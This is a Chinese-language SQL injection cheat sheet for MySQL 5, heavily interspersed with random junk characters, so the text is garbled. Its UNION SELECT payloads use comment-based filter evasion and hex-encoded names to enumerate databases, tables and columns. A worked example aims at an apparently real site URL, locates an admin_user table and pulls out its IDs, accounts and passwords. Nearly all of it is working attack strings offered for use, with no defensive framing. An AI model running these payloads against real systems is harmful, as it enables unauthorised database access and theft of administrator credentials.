查库+ @+ Y% \ f& _: {- Y8 p' x5 r
/ P" W. G1 ~. Y( T, c
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*
4 X L# |- R3 o E9 N. p. k d- h* ]" r L& |8 c
查表1 [$ t3 k8 H. R! m4 j; ^
/ a% Y. E# I( T+ |- L7 C$ l2 h. ~1 g
id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
+ r3 k5 ]9 g, h l* Z$ }* O1 I6 H
- w6 n6 C# j2 K$ h查段7 O( u% n( Y. W/ U0 q
+ x% z5 }0 f0 lid=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,13 v" U4 W& s& j6 W0 T
; c6 J! f. x3 `! W: s$ b
, P+ X( ]* N/ A/ E3 Jmysql5高级注入方法暴表 |, g9 p5 N* [0 b) ^' R
3 O, L/ T0 s8 X9 Q3 Q4 }
例子如下:( o& e; p- F* n t. u
, f9 H. Y! V* B* ~5 A
1.爆表
) ^2 h( [. u" b' `/ }/ M( Xhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)& T9 K- F6 T l( v
这样爆到第4个时出现了admin_user表。
. a# Q5 r) \% q1 P2 s8 h# k7 _4 @
9 i! M9 n& g7 @2 U2 d: E8 O% a2.暴字段
( u3 D$ [) V. a, `* O) L# E% mhttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/*
6 n% O) Y) O2 `5 N/ n6 i% X" g7 k2 V( ` d2 c" M! t
+ D% v7 K; j% R# F T& V3.爆密码$ u* s. r) D/ p4 p+ t4 J
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* 9 |* P2 s0 j$ a# t0 P
6 }* ? a T5 C( z6 t W( I
g$ I N+ g9 V8 T; T1 W |